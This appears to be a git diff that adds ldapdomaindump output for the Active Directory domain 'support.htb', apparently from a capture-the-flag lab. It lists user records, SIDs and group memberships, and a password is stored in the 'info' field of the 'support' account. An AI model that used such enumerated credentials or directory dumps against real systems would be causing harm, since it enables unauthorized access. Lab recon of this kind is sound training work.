+ "27514"
+ ],
+ "primaryGroupID": [
+ 513
+ ],
+ "pwdLastSet": [
+ "2022-05-28 11:13:53.133921+00:00"
+ ],
+ "sAMAccountName": [
+ "raven.clifton"
+ ],
+ "sAMAccountType": [
+ 805306368
+ ],
+ "sn": [
+ "raven"
+ ],
+ "st": [
+ "NC"
+ ],
+ "streetAddress": [
+ "Skipper Bowles Dr"
+ ],
+ "uSNChanged": [
+ 12923
+ ],
+ "uSNCreated": [
+ 12908
+ ],
+ "userAccountControl": [
+ 66048
+ ],
+ "whenChanged": [
+ "2022-05-28 11:13:53+00:00"
+ ],
+ "whenCreated": [
+ "2022-05-28 11:13:52+00:00"
+ ]
+ },
+ "dn": "CN=raven.clifton,CN=Users,DC=support,DC=htb"
+},{
+ "attributes": {
+ "accountExpires": [
+ "9999-12-31 23:59:59.999999+00:00"
+ ],
+ "badPasswordTime": [
+ "1601-01-01 00:00:00+00:00"
+ ],
+ "badPwdCount": [
+ 0
+ ],
+ "c": [
+ "US"
+ ],
+ "cn": [
+ "levine.leopoldo"
+ ],
+ "codePage": [
+ 0
+ ],
+ "company": [
+ "support"
+ ],
+ "countryCode": [
+ 0
+ ],
+ "dSCorePropagationData": [
+ "2022-05-28 11:13:37+00:00",
+ "1601-01-01 00:00:00+00:00"
+ ],
+ "distinguishedName": [
+ "CN=levine.leopoldo,CN=Users,DC=support,DC=htb"
+ ],
+ "givenName": [
+ "leopoldo"
+ ],
+ "instanceType": [
+ 4
+ ],
+ "l": [
+ "Chapel Hill"
+ ],
+ "lastLogoff": [
+ "1601-01-01 00:00:00+00:00"
+ ],
+ "lastLogon": [
+ "1601-01-01 00:00:00+00:00"
+ ],
+ "logonCount": [
+ 0
+ ],
+ "mail": [
+ "levine.leopoldo@support.htb"
+ ],
+ "name": [
+ "levine.leopoldo"
+ ],
+ "objectCategory": [
+ "CN=Person,CN=Schema,CN=Configuration,DC=support,DC=htb"
+ ],
+ "objectClass": [
+ "top",
+ "person",
+ "organizationalPerson",
+ "user"
+ ],
+ "objectGUID": [
+ "{4df5a4cd-678b-4235-afae-42bf7c78dfd1}"
+ ],
+ "objectSid": [
+ "S-1-5-21-1677581083-3380853377-188903654-1111"
+ ],
+ "postalCode": [
+ "27514"
+ ],
+ "primaryGroupID": [
+ 513
+ ],
+ "pwdLastSet": [
+ "2022-05-28 11:13:37.508924+00:00"
+ ],
+ "sAMAccountName": [
+ "levine.leopoldo"
+ ],
+ "sAMAccountType": [
+ 805306368
+ ],
+ "sn": [
+ "levine"
+ ],
+ "st": [
+ "NC"
+ ],
+ "streetAddress": [
+ "Skipper Bowles Dr"
+ ],
+ "uSNChanged": [
+ 12906
+ ],
+ "uSNCreated": [
+ 12891
+ ],
+ "userAccountControl": [
+ 66048
+ ],
+ "whenChanged": [
+ "2022-05-28 11:13:38+00:00"
+ ],
+ "whenCreated": [
+ "2022-05-28 11:13:37+00:00"
+ ]
+ },
+ "dn": "CN=levine.leopoldo,CN=Users,DC=support,DC=htb"
+},{
+ "attributes": {
+ "accountExpires": [
+ "9999-12-31 23:59:59.999999+00:00"
+ ],
+ "badPasswordTime": [
+ "1601-01-01 00:00:00+00:00"
+ ],
+ "badPwdCount": [
+ 0
+ ],
+ "c": [
+ "US"
+ ],
+ "cn": [
+ "thomas.raphael"
+ ],
+ "codePage": [
+ 0
+ ],
+ "company": [
+ "support"
+ ],
+ "countryCode": [
+ 0
+ ],
+ "dSCorePropagationData": [
+ "2022-05-28 11:13:22+00:00",
+ "1601-01-01 00:00:00+00:00"
+ ],
+ "distinguishedName": [
+ "CN=thomas.raphael,CN=Users,DC=support,DC=htb"
+ ],
+ "givenName": [
+ "raphael"
+ ],
+ "instanceType": [
+ 4
+ ],
+ "l": [
+ "Chapel Hill"
+ ],
+ "lastLogoff": [
+ "1601-01-01 00:00:00+00:00"
+ ],
+ "lastLogon": [
+ "1601-01-01 00:00:00+00:00"
+ ],
+ "logonCount": [
+ 0
+ ],
+ "mail": [
+ "thomas.raphael@support.htb"
+ ],
+ "name": [
+ "thomas.raphael"
+ ],
+ "objectCategory": [
+ "CN=Person,CN=Schema,CN=Configuration,DC=support,DC=htb"
+ ],
+ "objectClass": [
+ "top",
+ "person",
+ "organizationalPerson",
+ "user"
+ ],
+ "objectGUID": [
+ "{e7ddaab1-a355-4dc1-94b8-2b53d011b0ba}"
+ ],
+ "objectSid": [
+ "S-1-5-21-1677581083-3380853377-188903654-1110"
+ ],
+ "postalCode": [
+ "27514"
+ ],
+ "primaryGroupID": [
+ 513
+ ],
+ "pwdLastSet": [
+ "2022-05-28 11:13:21.774559+00:00"
+ ],
+ "sAMAccountName": [
+ "thomas.raphael"
+ ],
+ "sAMAccountType": [
+ 805306368
+ ],
+ "sn": [
+ "thomas"
+ ],
+ "st": [
+ "NC"
+ ],
+ "streetAddress": [
+ "Skipper Bowles Dr"
+ ],
+ "uSNChanged": [
+ 12721
+ ],
+ "uSNCreated": [
+ 12706
+ ],
+ "userAccountControl": [
+ 66048
+ ],
+ "whenChanged": [
+ "2022-05-28 11:13:22+00:00"
+ ],
+ "whenCreated": [
+ "2022-05-28 11:13:21+00:00"
+ ]
+ },
+ "dn": "CN=thomas.raphael,CN=Users,DC=support,DC=htb"
+},{
+ "attributes": {
+ "accountExpires": [
+ "9999-12-31 23:59:59.999999+00:00"
+ ],
+ "badPasswordTime": [
+ "1601-01-01 00:00:00+00:00"
+ ],
+ "badPwdCount": [
+ 0
+ ],
+ "c": [
+ "US"
+ ],
+ "cn": [
+ "anderson.damian"
+ ],
+ "codePage": [
+ 0
+ ],
+ "company": [
+ "support"
+ ],
+ "countryCode": [
+ 0
+ ],
+ "dSCorePropagationData": [
+ "2022-05-28 11:13:06+00:00",
+ "1601-01-01 00:00:00+00:00"
+ ],
+ "distinguishedName": [
+ "CN=anderson.damian,CN=Users,DC=support,DC=htb"
+ ],
+ "givenName": [
+ "damian"
+ ],
+ "instanceType": [
+ 4
+ ],
+ "l": [
+ "Chapel Hill"
+ ],
+ "lastLogoff": [
+ "1601-01-01 00:00:00+00:00"
+ ],
+ "lastLogon": [
+ "1601-01-01 00:00:00+00:00"
+ ],
+ "logonCount": [
+ 0
+ ],
+ "mail": [
+ "anderson.damian@support.htb"
+ ],
+ "name": [
+ "anderson.damian"
+ ],
+ "objectCategory": [
+ "CN=Person,CN=Schema,CN=Configuration,DC=support,DC=htb"
+ ],
+ "objectClass": [
+ "top",
+ "person",
+ "organizationalPerson",
+ "user"
+ ],
+ "objectGUID": [
+ "{fb002adf-875c-46a9-8d93-2655dc0c2885}"
+ ],
+ "objectSid": [
+ "S-1-5-21-1677581083-3380853377-188903654-1109"
+ ],
+ "postalCode": [
+ "27514"
+ ],
+ "primaryGroupID": [
+ 513
+ ],
+ "pwdLastSet": [
+ "2022-05-28 11:13:05.993294+00:00"
+ ],
+ "sAMAccountName": [
+ "anderson.damian"
+ ],
+ "sAMAccountType": [
+ 805306368
+ ],
+ "sn": [
+ "anderson"
+ ],
+ "st": [
+ "NC"
+ ],
+ "streetAddress": [
+ "Skipper Bowles Dr"
+ ],
+ "uSNChanged": [
+ 12704
+ ],
+ "uSNCreated": [
+ 12689
+ ],
+ "userAccountControl": [
+ 66048
+ ],
+ "whenChanged": [
+ "2022-05-28 11:13:06+00:00"
+ ],
+ "whenCreated": [
+ "2022-05-28 11:13:05+00:00"
+ ]
+ },
+ "dn": "CN=anderson.damian,CN=Users,DC=support,DC=htb"
+},{
+ "attributes": {
+ "accountExpires": [
+ "9999-12-31 23:59:59.999999+00:00"
+ ],
+ "badPasswordTime": [
+ "1601-01-01 00:00:00+00:00"
+ ],
+ "badPwdCount": [
+ 0
+ ],
+ "c": [
+ "US"
+ ],
+ "cn": [
+ "wilson.shelby"
+ ],
+ "codePage": [
+ 0
+ ],
+ "company": [
+ "support"
+ ],
+ "countryCode": [
+ 0
+ ],
+ "dSCorePropagationData": [
+ "2022-05-28 11:12:50+00:00",
+ "1601-01-01 00:00:00+00:00"
+ ],
+ "distinguishedName": [
+ "CN=wilson.shelby,CN=Users,DC=support,DC=htb"
+ ],
+ "givenName": [
+ "shelby"
+ ],
+ "instanceType": [
+ 4
+ ],
+ "l": [
+ "Chapel Hill"
+ ],
+ "lastLogoff": [
+ "1601-01-01 00:00:00+00:00"
+ ],
+ "lastLogon": [
+ "1601-01-01 00:00:00+00:00"
+ ],
+ "logonCount": [
+ 0
+ ],
+ "mail": [
+ "wilson.shelby@support.htb"
+ ],
+ "name": [
+ "wilson.shelby"
+ ],
+ "objectCategory": [
+ "CN=Person,CN=Schema,CN=Configuration,DC=support,DC=htb"
+ ],
+ "objectClass": [
+ "top",
+ "person",
+ "organizationalPerson",
+ "user"
+ ],
+ "objectGUID": [
+ "{5688b25d-f151-4689-b50f-90997c9246f4}"
+ ],
+ "objectSid": [
+ "S-1-5-21-1677581083-3380853377-188903654-1108"
+ ],
+ "postalCode": [
+ "27514"
+ ],
+ "primaryGroupID": [
+ 513
+ ],
+ "pwdLastSet": [
+ "2022-05-28 11:12:50.352678+00:00"
+ ],
+ "sAMAccountName": [
+ "wilson.shelby"
+ ],
+ "sAMAccountType": [
+ 805306368
+ ],
+ "sn": [
+ "wilson"
+ ],
+ "st": [
+ "NC"
+ ],
+ "streetAddress": [
+ "Skipper Bowles Dr"
+ ],
+ "uSNChanged": [
+ 12687
+ ],
+ "uSNCreated": [
+ 12672
+ ],
+ "userAccountControl": [
+ 66048
+ ],
+ "whenChanged": [
+ "2022-05-28 11:12:51+00:00"
+ ],
+ "whenCreated": [
+ "2022-05-28 11:12:50+00:00"
+ ]
+ },
+ "dn": "CN=wilson.shelby,CN=Users,DC=support,DC=htb"
+},{
+ "attributes": {
+ "accountExpires": [
+ "9999-12-31 23:59:59.999999+00:00"
+ ],
+ "badPasswordTime": [
+ "1601-01-01 00:00:00+00:00"
+ ],
+ "badPwdCount": [
+ 0
+ ],
+ "c": [
+ "US"
+ ],
+ "cn": [
+ "hernandez.stanley"
+ ],
+ "codePage": [
+ 0
+ ],
+ "company": [
+ "support"
+ ],
+ "countryCode": [
+ 0
+ ],
+ "dSCorePropagationData": [
+ "2022-05-28 11:12:35+00:00",
+ "1601-01-01 00:00:00+00:00"
+ ],
+ "distinguishedName": [
+ "CN=hernandez.stanley,CN=Users,DC=support,DC=htb"
+ ],
+ "givenName": [
+ "stanley"
+ ],
+ "instanceType": [
+ 4
+ ],
+ "l": [
+ "Chapel Hill"
+ ],
+ "lastLogoff": [
+ "1601-01-01 00:00:00+00:00"
+ ],
+ "lastLogon": [
+ "1601-01-01 00:00:00+00:00"
+ ],
+ "logonCount": [
+ 0
+ ],
+ "mail": [
+ "hernandez.stanley@support.htb"
+ ],
+ "name": [
+ "hernandez.stanley"
+ ],
+ "objectCategory": [
+ "CN=Person,CN=Schema,CN=Configuration,DC=support,DC=htb"
+ ],
+ "objectClass": [
+ "top",
+ "person",
+ "organizationalPerson",
+ "user"
+ ],
+ "objectGUID": [
+ "{2f6ecd2f-a44e-435c-9633-6427f30c36a8}"
+ ],
+ "objectSid": [
+ "S-1-5-21-1677581083-3380853377-188903654-1107"
+ ],
+ "postalCode": [
+ "27514"
+ ],
+ "primaryGroupID": [
+ 513
+ ],
+ "pwdLastSet": [
+ "2022-05-28 11:12:34.870817+00:00"
+ ],
+ "sAMAccountName": [
+ "hernandez.stanley"
+ ],
+ "sAMAccountType": [
+ 805306368
+ ],
+ "sn": [
+ "hernandez"
+ ],
+ "st": [
+ "NC"
+ ],
+ "streetAddress": [
+ "Skipper Bowles Dr"
+ ],
+ "uSNChanged": [
+ 12670
+ ],
+ "uSNCreated": [
+ 12655
+ ],
+ "userAccountControl": [
+ 66048
+ ],
+ "whenChanged": [
+ "2022-05-28 11:12:35+00:00"
+ ],
+ "whenCreated": [
+ "2022-05-28 11:12:34+00:00"
+ ]
+ },
+ "dn": "CN=hernandez.stanley,CN=Users,DC=support,DC=htb"
+},{
+ "attributes": {
+ "accountExpires": [
+ "9999-12-31 23:59:59.999999+00:00"
+ ],
+ "badPasswordTime": [
+ "1601-01-01 00:00:00+00:00"
+ ],
+ "badPwdCount": [
+ 0
+ ],
+ "c": [
+ "US"
+ ],
+ "cn": [
+ "smith.rosario"
+ ],
+ "codePage": [
+ 0
+ ],
+ "company": [
+ "support"
+ ],
+ "countryCode": [
+ 0
+ ],
+ "dSCorePropagationData": [
+ "2022-05-28 11:12:19+00:00",
+ "1601-01-01 00:00:00+00:00"
+ ],
+ "distinguishedName": [
+ "CN=smith.rosario,CN=Users,DC=support,DC=htb"
+ ],
+ "givenName": [
+ "rosario"
+ ],
+ "instanceType": [
+ 4
+ ],
+ "l": [
+ "Chapel Hill"
+ ],
+ "lastLogoff": [
+ "1601-01-01 00:00:00+00:00"
+ ],
+ "lastLogon": [
+ "1601-01-01 00:00:00+00:00"
+ ],
+ "logonCount": [
+ 0
+ ],
+ "mail": [
+ "smith.rosario@support.htb"
+ ],
+ "name": [
+ "smith.rosario"
+ ],
+ "objectCategory": [
+ "CN=Person,CN=Schema,CN=Configuration,DC=support,DC=htb"
+ ],
+ "objectClass": [
+ "top",
+ "person",
+ "organizationalPerson",
+ "user"
+ ],
+ "objectGUID": [
+ "{e0a8b9c6-6c69-46b9-a37e-7906dc204cae}"
+ ],
+ "objectSid": [
+ "S-1-5-21-1677581083-3380853377-188903654-1106"
+ ],
+ "postalCode": [
+ "27514"
+ ],
+ "primaryGroupID": [
+ 513
+ ],
+ "pwdLastSet": [
+ "2022-05-28 11:12:19.305798+00:00"
+ ],
+ "sAMAccountName": [
+ "smith.rosario"
+ ],
+ "sAMAccountType": [
+ 805306368
+ ],
+ "sn": [
+ "smith"
+ ],
+ "st": [
+ "NC"
+ ],
+ "streetAddress": [
+ "Skipper Bowles Dr"
+ ],
+ "uSNChanged": [
+ 12653
+ ],
+ "uSNCreated": [
+ 12638
+ ],
+ "userAccountControl": [
+ 66048
+ ],
+ "whenChanged": [
+ "2022-05-28 11:12:19+00:00"
+ ],
+ "whenCreated": [
+ "2022-05-28 11:12:19+00:00"
+ ]
+ },
+ "dn": "CN=smith.rosario,CN=Users,DC=support,DC=htb"
+},{
+ "attributes": {
+ "accountExpires": [
+ "9999-12-31 23:59:59.999999+00:00"
+ ],
+ "badPasswordTime": [
+ "2022-08-19 14:37:58.764990+00:00"
+ ],
+ "badPwdCount": [
+ 0
+ ],
+ "c": [
+ "US"
+ ],
+ "cn": [
+ "support"
+ ],
+ "codePage": [
+ 0
+ ],
+ "company": [
+ "support"
+ ],
+ "countryCode": [
+ 0
+ ],
+ "dSCorePropagationData": [
+ "2022-05-28 11:12:01+00:00",
+ "1601-01-01 00:00:00+00:00"
+ ],
+ "distinguishedName": [
+ "CN=support,CN=Users,DC=support,DC=htb"
+ ],
+ "info": [
+ "Ironside47pleasure40Watchful"
+ ],
+ "instanceType": [
+ 4
+ ],
+ "l": [
+ "Chapel Hill"
+ ],
+ "lastLogoff": [
+ "1601-01-01 00:00:00+00:00"
+ ],
+ "lastLogon": [
+ "2022-08-19 14:44:55.318472+00:00"
+ ],
+ "lastLogonTimestamp": [
+ "2022-08-19 13:47:57.299465+00:00"
+ ],
+ "logonCount": [
+ 0
+ ],
+ "memberOf": [
+ "CN=Shared Support Accounts,CN=Users,DC=support,DC=htb",
+ "CN=Remote Management Users,CN=Builtin,DC=support,DC=htb"
+ ],
+ "name": [
+ "support"
+ ],
+ "objectCategory": [
+ "CN=Person,CN=Schema,CN=Configuration,DC=support,DC=htb"
+ ],
+ "objectClass": [
+ "top",
+ "person",
+ "organizationalPerson",
+ "user"
+ ],
+ "objectGUID": [
+ "{3139a30a-31fa-4530-9ea4-8053b396a7f1}"
+ ],
+ "objectSid": [
+ "S-1-5-21-1677581083-3380853377-188903654-1105"
+ ],
+ "postalCode": [
+ "27514"
+ ],
+ "primaryGroupID": [
+ 513
+ ],
+ "pwdLastSet": [
+ "2022-05-28 11:12:00.977707+00:00"
+ ],
+ "sAMAccountName": [
+ "support"
+ ],
+ "sAMAccountType": [
+ 805306368
+ ],
+ "st": [
+ "NC"
+ ],
+ "streetAddress": [
+ "Skipper Bowles Dr"
+ ],
+ "uSNChanged": [
+ 122847
+ ],
+ "uSNCreated": [
+ 12617
+ ],
+ "userAccountControl": [
+ 66048
+ ],
+ "whenChanged": [
+ "2022-08-19 13:47:57+00:00"
+ ],
+ "whenCreated": [
+ "2022-05-28 11:12:00+00:00"
+ ]
+ },
+ "dn": "CN=support,CN=Users,DC=support,DC=htb"
+},{
+ "attributes": {
+ "accountExpires": [
+ "9999-12-31 23:59:59.999999+00:00"
+ ],
+ "badPasswordTime": [
+ "2022-08-19 14:43:11.827740+00:00"
+ ],
+ "badPwdCount": [
+ 0
+ ],
+ "c": [
+ "US"
+ ],
+ "cn": [
+ "ldap"
+ ],
+ "codePage": [
+ 0
+ ],
+ "company": [
+ "support"
+ ],
+ "countryCode": [
+ 0
+ ],
+ "dSCorePropagationData": [
+ "2022-05-28 11:11:46+00:00",
+ "1601-01-01 00:00:00+00:00"
+ ],
+ "distinguishedName": [
+ "CN=ldap,CN=Users,DC=support,DC=htb"
+ ],
+ "instanceType": [
+ 4
+ ],
+ "l": [
+ "Chapel Hill"
+ ],
+ "lastLogoff": [
+ "1601-01-01 00:00:00+00:00"
+ ],
+ "lastLogon": [
+ "2022-08-19 14:53:00.009041+00:00"
+ ],
+ "lastLogonTimestamp": [
+ "2022-08-19 13:02:01.121540+00:00"
+ ],
+ "logonCount": [
+ 0
+ ],
+ "name": [
+ "ldap"
+ ],
+ "objectCategory": [
+ "CN=Person,CN=Schema,CN=Configuration,DC=support,DC=htb"
+ ],
+ "objectClass": [
+ "top",
+ "person",
+ "organizationalPerson",
+ "user"
+ ],
+ "objectGUID": [
+ "{8c2fa5ff-cd3a-414f-b264-5b7d0b3ae07d}"
+ ],
+ "objectSid": [
+ "S-1-5-21-1677581083-3380853377-188903654-1104"
+ ],
+ "postalCode": [
+ "27514"
+ ],
+ "primaryGroupID": [
+ 513
+ ],
+ "pwdLastSet": [
+ "2022-05-28 11:11:46.462053+00:00"
+ ],
+ "sAMAccountName": [
+ "ldap"
+ ],
+ "sAMAccountType": [
+ 805306368
+ ],
+ "st": [
+ "NC"
+ ],
+ "streetAddress": [
+ "Skipper Bowles Dr"
+ ],
+ "uSNChanged": [
+ 122843
+ ],
+ "uSNCreated": [
+ 12603
+ ],
+ "userAccountControl": [
+ 66048
+ ],
+ "whenChanged": [
+ "2022-08-19 13:02:01+00:00"
+ ],
+ "whenCreated": [
+ "2022-05-28 11:11:46+00:00"
+ ]
+ },
+ "dn": "CN=ldap,CN=Users,DC=support,DC=htb"
+},{
+ "attributes": {
+ "accountExpires": [
+ "9999-12-31 23:59:59.999999+00:00"
+ ],
+ "adminCount": [
+ 1
+ ],
+ "badPasswordTime": [
+ "1601-01-01 00:00:00+00:00"
+ ],
+ "badPwdCount": [
+ 0
+ ],
+ "cn": [
+ "krbtgt"
+ ],
+ "codePage": [
+ 0
+ ],
+ "countryCode": [
+ 0
+ ],
+ "dSCorePropagationData": [
+ "2022-05-28 11:19:47+00:00",
+ "2022-05-28 11:03:44+00:00",
+ "1601-01-01 00:04:16+00:00"
+ ],
+ "description": [
+ "Key Distribution Center Service Account"
+ ],
+ "distinguishedName": [
+ "CN=krbtgt,CN=Users,DC=support,DC=htb"
+ ],
+ "instanceType": [
+ 4
+ ],
+ "isCriticalSystemObject": [
+ true
+ ],
+ "lastLogoff": [
+ "1601-01-01 00:00:00+00:00"
+ ],
+ "lastLogon": [
+ "1601-01-01 00:00:00+00:00"
+ ],
+ "logonCount": [
+ 0
+ ],
+ "memberOf": [
+ "CN=Denied RODC Password Replication Group,CN=Users,DC=support,DC=htb"
+ ],
+ "msDS-SupportedEncryptionTypes": [
+ 0
+ ],
+ "name": [
+ "krbtgt"
+ ],
+ "objectCategory": [
+ "CN=Person,CN=Schema,CN=Configuration,DC=support,DC=htb"
+ ],
+ "objectClass": [
+ "top",
+ "person",
+ "organizationalPerson",
+ "user"
+ ],
+ "objectGUID": [
+ "{d8fa16ff-159f-43b5-abc4-a14ca68551d6}"
+ ],
+ "objectSid": [
+ "S-1-5-21-1677581083-3380853377-188903654-502"
+ ],
+ "primaryGroupID": [
+ 513
+ ],
+ "pwdLastSet": [
+ "2022-05-28 11:03:43.762634+00:00"
+ ],
+ "sAMAccountName": [
+ "krbtgt"
+ ],
+ "sAMAccountType": [
+ 805306368
+ ],
+ "servicePrincipalName": [
+ "kadmin/changepw"
+ ],
+ "showInAdvancedViewOnly": [
+ true
+ ],
+ "uSNChanged": [
+ 13087
+ ],
+ "uSNCreated": [
+ 12324
+ ],
+ "userAccountControl": [
+ 514
+ ],
+ "whenChanged": [
+ "2022-05-28 11:19:47+00:00"
+ ],
+ "whenCreated": [
+ "2022-05-28 11:03:43+00:00"
+ ]
+ },
+ "dn": "CN=krbtgt,CN=Users,DC=support,DC=htb"
+},{
+ "attributes": {
+ "accountExpires": [
+ "1601-01-01 00:00:00+00:00"
+ ],
+ "badPasswordTime": [
+ "1601-01-01 00:00:00+00:00"
+ ],
+ "badPwdCount": [
+ 0
+ ],
+ "cn": [
+ "Guest"
+ ],
+ "codePage": [
+ 0
+ ],
+ "countryCode": [
+ 0
+ ],
+ "dSCorePropagationData": [
+ "2022-05-28 11:03:44+00:00",
+ "1601-01-01 00:00:01+00:00"
+ ],
+ "description": [
+ "Built-in account for guest access to the computer/domain"
+ ],
+ "distinguishedName": [
+ "CN=Guest,CN=Users,DC=support,DC=htb"
+ ],
+ "instanceType": [
+ 4
+ ],
+ "isCriticalSystemObject": [
+ true
+ ],
+ "lastLogoff": [
+ "1601-01-01 00:00:00+00:00"
+ ],
+ "lastLogon": [
+ "1601-01-01 00:00:00+00:00"
+ ],
+ "lastLogonTimestamp": [
+ "2022-08-19 06:15:24.931755+00:00"
+ ],
+ "logonCount": [
+ 0
+ ],
+ "logonHours": [
+ {
+ "encoded": "////////////////////////////",
+ "encoding": "base64"
+ }
+ ],
+ "memberOf": [
+ "CN=Guests,CN=Builtin,DC=support,DC=htb"
+ ],
+ "name": [
+ "Guest"
+ ],
+ "objectCategory": [
+ "CN=Person,CN=Schema,CN=Configuration,DC=support,DC=htb"
+ ],
+ "objectClass": [
+ "top",
+ "person",
+ "organizationalPerson",
+ "user"
+ ],
+ "objectGUID": [
+ "{1c087494-8a8f-4e63-90b2-084e5357942f}"
+ ],
+ "objectSid": [
+ "S-1-5-21-1677581083-3380853377-188903654-501"
+ ],
+ "primaryGroupID": [
+ 514
+ ],
+ "pwdLastSet": [
+ "2022-05-28 11:18:55.212082+00:00"
+ ],
+ "sAMAccountName": [
+ "Guest"
+ ],
+ "sAMAccountType": [
+ 805306368
+ ],
+ "uSNChanged": [
+ 81994
+ ],
+ "uSNCreated": [
+ 8197
+ ],
+ "userAccountControl": [
+ 66080
+ ],
+ "whenChanged": [
+ "2022-08-19 06:15:24+00:00"
+ ],
+ "whenCreated": [
+ "2022-05-28 11:01:56+00:00"
+ ]
+ },
+ "dn": "CN=Guest,CN=Users,DC=support,DC=htb"
+},{
+ "attributes": {
+ "accountExpires": [
+ "1601-01-01 00:00:00+00:00"
+ ],
+ "adminCount": [
+ 1
+ ],
+ "badPasswordTime": [
+ "2022-08-19 12:18:22.972431+00:00"
+ ],
+ "badPwdCount": [
+ 1
+ ],
+ "cn": [
+ "Administrator"
+ ],
+ "codePage": [
+ 0
+ ],
+ "countryCode": [
+ 0
+ ],
+ "dSCorePropagationData": [
+ "2022-05-28 11:19:47+00:00",
+ "2022-05-28 11:19:47+00:00",
+ "2022-05-28 11:03:44+00:00",
+ "1601-01-01 18:12:16+00:00"
+ ],
+ "description": [
+ "Built-in account for administering the computer/domain"
+ ],
+ "distinguishedName": [
+ "CN=Administrator,CN=Users,DC=support,DC=htb"
+ ],
+ "instanceType": [
+ 4
+ ],
+ "isCriticalSystemObject": [
+ true
+ ],
+ "lastLogoff": [
+ "1601-01-01 00:00:00+00:00"
+ ],
+ "lastLogon": [
+ "2022-08-19 04:32:50.767044+00:00"
+ ],
+ "lastLogonTimestamp": [
+ "2022-08-19 04:32:27.533430+00:00"
+ ],
+ "logonCount": [
+ 62
+ ],
+ "logonHours": [
+ {
+ "encoded": "////////////////////////////",
+ "encoding": "base64"
+ }
+ ],
+ "memberOf": [
+ "CN=Group Policy Creator Owners,CN=Users,DC=support,DC=htb",
+ "CN=Domain Admins,CN=Users,DC=support,DC=htb",
+ "CN=Enterprise Admins,CN=Users,DC=support,DC=htb",
+ "CN=Schema Admins,CN=Users,DC=support,DC=htb",
+ "CN=Administrators,CN=Builtin,DC=support,DC=htb"
+ ],
+ "name": [
+ "Administrator"
+ ],
+ "objectCategory": [
+ "CN=Person,CN=Schema,CN=Configuration,DC=support,DC=htb"
+ ],
+ "objectClass": [
+ "top",
+ "person",
+ "organizationalPerson",
+ "user"
+ ],
+ "objectGUID": [
+ "{e19ad196-8f3f-4b3b-931e-78c010470b97}"
+ ],
+ "objectSid": [
+ "S-1-5-21-1677581083-3380853377-188903654-500"
+ ],
+ "primaryGroupID": [
+ 513
+ ],
+ "pwdLastSet": [
+ "2022-07-19 17:55:56.729359+00:00"
+ ],
+ "sAMAccountName": [
+ "Administrator"
+ ],
+ "sAMAccountType": [
+ 805306368
+ ],
+ "uSNChanged": [
+ 81954
+ ],
+ "uSNCreated": [
+ 8196
+ ],
+ "userAccountControl": [
+ 512
+ ],
+ "whenChanged": [
+ "2022-08-19 04:32:27+00:00"
+ ],
+ "whenCreated": [
+ "2022-05-28 11:01:56+00:00"
+ ]
+ },
+ "dn": "CN=Administrator,CN=Users,DC=support,DC=htb"
+}] \ No newline at end of file
diff --git a/support/domaindump/domain_users_by_group.html b/support/domaindump/domain_users_by_group.html
new file mode 100644
index 0000000..429de43
--- /dev/null
+++ b/support/domaindump/domain_users_by_group.html
@@ -0,0 +1,95 @@
+<!DOCTYPE html>
+<html>
+<head><meta charset="UTF-8"><style type="text/css">tbody th {
+ border: 1px solid #000;
+}
+tbody td {
+ border: 1px solid #ababab;
+ border-spacing: 0px;
+ padding: 4px;
+ border-collapse: collapse;
+}
+body {
+ font-family: verdana;
+}
+table {
+ font-size: 13px;
+ border-collapse: collapse;
+ width: 100%;
+}
+tbody tr:nth-child(odd) td {
+ background-color: #eee;
+}
+tbody tr:hover td {
+ background-color: lightblue;
+}
+thead td {
+ font-size: 19px;
+ font-weight: bold;
+ padding: 10px 0px;
+}
+</style></head><body><table><thead><tr><td colspan="10" id="cn_Domain_Users">Domain Users</td></tr></thead><tbody><tr><th>CN</th><th>name</th><th>SAM Name</th><th>Created on</th><th>Changed on</th><th>lastLogon</th><th>Flags</th><th>pwdLastSet</th><th>SID</th><th>description</th></tr>
+<tr><td>ford.victoria</td><td>ford.victoria</td><td>ford.victoria</td><td>05/28/22 11:15:57</td><td>05/28/22 11:15:58</td><td>01/01/01 00:00:00</td><td>NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD</td><td>05/28/22 11:15:58</td><td><abbr title="S-1-5-21-1677581083-3380853377-188903654-1120">1120</abbr></td><td>&nbsp;</td></tr>
+<tr><td>stoll.rachelle</td><td>stoll.rachelle</td><td>stoll.rachelle</td><td>05/28/22 11:15:42</td><td>05/28/22 11:15:43</td><td>01/01/01 00:00:00</td><td>NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD</td><td>05/28/22 11:15:42</td><td><abbr title="S-1-5-21-1677581083-3380853377-188903654-1119">1119</abbr></td><td>&nbsp;</td></tr>
+<tr><td>daughtler.mabel</td><td>daughtler.mabel</td><td>daughtler.mabel</td><td>05/28/22 11:15:26</td><td>05/28/22 11:15:27</td><td>01/01/01 00:00:00</td><td>NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD</td><td>05/28/22 11:15:26</td><td><abbr title="S-1-5-21-1677581083-3380853377-188903654-1118">1118</abbr></td><td>&nbsp;</td></tr>
+<tr><td>langley.lucy</td><td>langley.lucy</td><td>langley.lucy</td><td>05/28/22 11:15:10</td><td>05/28/22 11:15:11</td><td>01/01/01 00:00:00</td><td>NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD</td><td>05/28/22 11:15:10</td><td><abbr title="S-1-5-21-1677581083-3380853377-188903654-1117">1117</abbr></td><td>&nbsp;</td></tr>
+<tr><td>west.laura</td><td>west.laura</td><td>west.laura</td><td>05/28/22 11:14:55</td><td>05/28/22 11:14:56</td><td>01/01/01 00:00:00</td><td>NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD</td><td>05/28/22 11:14:55</td><td><abbr title="S-1-5-21-1677581083-3380853377-188903654-1116">1116</abbr></td><td>&nbsp;</td></tr>
+<tr><td>monroe.david</td><td>monroe.david</td><td>monroe.david</td><td>05/28/22 11:14:39</td><td>05/28/22 11:14:40</td><td>01/01/01 00:00:00</td><td>NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD</td><td>05/28/22 11:14:39</td><td><abbr title="S-1-5-21-1677581083-3380853377-188903654-1115">1115</abbr></td><td>&nbsp;</td></tr>
+<tr><td>cromwell.gerard</td><td>cromwell.gerard</td><td>cromwell.gerard</td><td>05/28/22 11:14:24</td><td>05/28/22 11:14:24</td><td>01/01/01 00:00:00</td><td>NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD</td><td>05/28/22 11:14:24</td><td><abbr title="S-1-5-21-1677581083-3380853377-188903654-1114">1114</abbr></td><td>&nbsp;</td></tr>
